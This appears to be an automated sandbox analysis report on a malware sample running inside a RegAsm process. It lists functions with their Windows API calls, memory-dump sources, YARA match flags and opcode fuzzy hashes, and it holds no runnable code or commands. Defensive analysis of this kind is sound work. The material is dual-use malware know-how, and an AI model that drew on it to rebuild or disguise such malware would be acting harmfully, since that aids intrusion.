                                                                                                                                                                                                • Instruction Fuzzy Hash: FE3144B4610201ABFB04EF69EC85F96B3E9FF58214F148928F959C7241E7B5F910CBA1
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B5355B0 Relevance: 4.6, APIs: 3, Instructions: 106COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: c04bdca72e0e63e8687a95d3f621364c964cbf46967514ec5f0fa986b1a92318
                                                                                                                                                                                                • Instruction ID: c11cf5350287a0d2333891451eca823124872330cfa0a9877888face8d4a11be
                                                                                                                                                                                                • Opcode Fuzzy Hash: c04bdca72e0e63e8687a95d3f621364c964cbf46967514ec5f0fa986b1a92318
                                                                                                                                                                                                • Instruction Fuzzy Hash: 78318BB5500301AFEF109F29EC85B9AB7E9EF84359F10882CF8858B361E771E990CB51
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B50E170 Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 902a87da297e264a9e862ae0cde9f59cc3f3419bb1a04509bd1201f2d4081541
                                                                                                                                                                                                • Instruction ID: 4e7144197631f01528edef44c52db5f49491af033c9aa0f2eb6941b28e20f680
                                                                                                                                                                                                • Opcode Fuzzy Hash: 902a87da297e264a9e862ae0cde9f59cc3f3419bb1a04509bd1201f2d4081541
                                                                                                                                                                                                • Instruction Fuzzy Hash: 3511E479A002017BFA10AF399C46FDB76AEDFC8754F14081CF985D3241EA32E91197A2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B492112 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • GetEnabledXStateFeatures, xrefs: 1B670C61
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: GetEnabledXStateFeatures
                                                                                                                                                                                                • API String ID: 0-1068256093
                                                                                                                                                                                                • Opcode ID: dbf727c37c10751f32ab045c9ddfac58d62437f83106434467ceb93fa75cca0a
                                                                                                                                                                                                • Instruction ID: bbcbc5e54cd788ba8e05fe92fe568d2d3522ceb002f1374eb2ab10f43a95b14e
                                                                                                                                                                                                • Opcode Fuzzy Hash: dbf727c37c10751f32ab045c9ddfac58d62437f83106434467ceb93fa75cca0a
                                                                                                                                                                                                • Instruction Fuzzy Hash: E8F0C2B950112877CF163F60DD48BDE3E16AFA8B21F014525FD4826294DA72992196E4
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 0040FB47 Relevance: 3.1, APIs: 2, Instructions: 61timeCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 0040FB4C
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                • GetSystemTime.KERNEL32(?,004253D8,00000000,00000001,00000000,00425502,004254FF), ref: 0040FB8C
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prologSystemTimelstrcpy
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 818586813-0
                                                                                                                                                                                                • Opcode ID: fad617f0d976be7dad0ee63a09eada3ef602cfcdba4d093542321a0bef98dcae
                                                                                                                                                                                                • Instruction ID: 4df3709997d0cc12e09e6dacff74294a906b8749b286f4ad1b2c6ae5e2a4139a
                                                                                                                                                                                                • Opcode Fuzzy Hash: fad617f0d976be7dad0ee63a09eada3ef602cfcdba4d093542321a0bef98dcae
                                                                                                                                                                                                • Instruction Fuzzy Hash: D911E671A00214EBCB05EFAAC851AAEFBB5EF95714F40847FE406B7291C7785A05CB54
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B682D38 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • EnumSystemLocalesW.KERNEL32(1B682EA6,00000001,00000000,?,?,?,1B68362E,00000000), ref: 1B682DAA
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: EnumLocalesSystem
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2099609381-0
                                                                                                                                                                                                • Opcode ID: 9932a3f707ea16d9654554b8be40d529ce37319d761065789030ec01b0099fce
                                                                                                                                                                                                • Instruction ID: 1e4f94e29ef0e476c417299fbcf88f9df3440f85d9e4c0fecb1c28a605598c0e
                                                                                                                                                                                                • Opcode Fuzzy Hash: 9932a3f707ea16d9654554b8be40d529ce37319d761065789030ec01b0099fce
                                                                                                                                                                                                • Instruction Fuzzy Hash: C411487B6007029FDB089F38C891AEABBA2FF80358B14442CEA8787B40D771B407CB40
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B682DF9 Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • EnumSystemLocalesW.KERNEL32(1B68318D,00000001,?,?,?,?,1B6835F6,?), ref: 1B682E43
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: EnumLocalesSystem
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2099609381-0
                                                                                                                                                                                                • Opcode ID: 8031e8c557a0076543394b13cbe8f5caaa275f2c6ed810838f84f36cbed1edec
                                                                                                                                                                                                • Instruction ID: d4bc401b76e0721177f3d9bf248b5159379031839f0c11ada0fc6a01022a99f8
                                                                                                                                                                                                • Opcode Fuzzy Hash: 8031e8c557a0076543394b13cbe8f5caaa275f2c6ed810838f84f36cbed1edec
                                                                                                                                                                                                • Instruction Fuzzy Hash: 54F08B762003041FDB144F34CCC4BEA7B91FF80768F05842CFA454B680C7B1A802CB54
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B66FF17 Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • EnumSystemLocalesW.KERNEL32(1B66FF01,00000001,1B6CD298,0000000C,1B670A92,?), ref: 1B66FF4F
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: EnumLocalesSystem
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2099609381-0
                                                                                                                                                                                                • Opcode ID: 1c64810483d1bd431cfab53d3d9da3689623006dffd760b73574958cbad4a630
                                                                                                                                                                                                • Instruction ID: d029a68ff29d91b8f75e289ee74ea363d25e14041d89df44689be5fbed8dd789
                                                                                                                                                                                                • Opcode Fuzzy Hash: 1c64810483d1bd431cfab53d3d9da3689623006dffd760b73574958cbad4a630
                                                                                                                                                                                                • Instruction Fuzzy Hash: D4F04F76A00214EFDB04DF98D481BDD7BB0FB69325F00416EE814D7290C7759904CF50
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B682CB6 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • EnumSystemLocalesW.KERNEL32(1B682BE6,00000001,?,?,?,1B683650,?), ref: 1B682CED
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: EnumLocalesSystem
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2099609381-0
                                                                                                                                                                                                • Opcode ID: 7817db0f3d235b0fd37b91b4501209637453c4e258a1d4eac789f548f28f9b44
                                                                                                                                                                                                • Instruction ID: 0c0b7caf0b5862af5cd1d6d1111874e04a73f03d139c51f8c8a91187d2e2482d
                                                                                                                                                                                                • Opcode Fuzzy Hash: 7817db0f3d235b0fd37b91b4501209637453c4e258a1d4eac789f548f28f9b44
                                                                                                                                                                                                • Instruction Fuzzy Hash: F2F0E53A70034A5BCB049F39DC45BAA7F94FFC2754B06409CEE058B250C671A946CBA0
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 0041D468 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(Function_0001D426), ref: 0041D46D
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3192549508-0
                                                                                                                                                                                                • Opcode ID: de0aac2f3061b1883abbbc2dc59b1f2f59bebef8228863a6d3d464d6577e8f83
                                                                                                                                                                                                • Instruction ID: 9aa36228bd1312c3dafb40d94854ee8584c16ee015a5e92c1a44cea04fe1b8fb
                                                                                                                                                                                                • Opcode Fuzzy Hash: de0aac2f3061b1883abbbc2dc59b1f2f59bebef8228863a6d3d464d6577e8f83
                                                                                                                                                                                                • Instruction Fuzzy Hash: E39002B4F511448A86101B706D0954566D05B9861279244626101C4464DA745181D529
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B4942AF Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(Function_00004214), ref: 1B634A98
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3192549508-0
                                                                                                                                                                                                • Opcode ID: f985dfb10ed505531c1fb74d6215c0ec2154f4fdced6bc74d9cee4344334cf1d
                                                                                                                                                                                                • Instruction ID: 319339f03e70d4f775b50e7953a24c5d2f059e0a04a17ea1f1d093fb0dbe5278
                                                                                                                                                                                                • Opcode Fuzzy Hash: f985dfb10ed505531c1fb74d6215c0ec2154f4fdced6bc74d9cee4344334cf1d
                                                                                                                                                                                                • Instruction Fuzzy Hash: 9F9002F454412A5ACE249692EE498D8A92465BEA473004064E54D5441C851641458637
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 0040D37F Relevance: 93.4, APIs: 62, Instructions: 416memorystringCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 0040D384
                                                                                                                                                                                                  • Part of subcall function 0040D284: _EH_prolog.MSVCRT ref: 0040D289
                                                                                                                                                                                                  • Part of subcall function 0040D284: lstrlenA.KERNEL32(?,6CBD7FA0,75AA5460,00000000), ref: 0040D2AD
                                                                                                                                                                                                  • Part of subcall function 0040D284: strchr.MSVCRT ref: 0040D2BF
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,6CBD7FA0,00000000), ref: 0040D3D3
                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,6CBD7FA0,00000000), ref: 0040D3DA
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,6CBD7FA0,00000000), ref: 0040D3EF
                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,6CBD7FA0,00000000), ref: 0040D3F6
                                                                                                                                                                                                • strcpy_s.MSVCRT ref: 0040D42F
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,75AA5460,?,6CBD7FA0,00000000), ref: 0040D446
                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,75AA5460,?,6CBD7FA0,00000000), ref: 0040D44D
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,75AA5460,?,6CBD7FA0,00000000), ref: 0040D473
                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,75AA5460,?,6CBD7FA0,00000000), ref: 0040D47A
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,75AA5460,?,6CBD7FA0,00000000), ref: 0040D481
                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,75AA5460,?,6CBD7FA0,00000000), ref: 0040D488
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,75AA5460,?,6CBD7FA0,00000000), ref: 0040D49D
                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,75AA5460,?,6CBD7FA0,00000000), ref: 0040D4A4
                                                                                                                                                                                                • strcpy_s.MSVCRT ref: 0040D4B7
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,75AA5460,?,6CBD7FA0,00000000), ref: 0040D4C8
                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,75AA5460,?,6CBD7FA0,00000000), ref: 0040D4CF
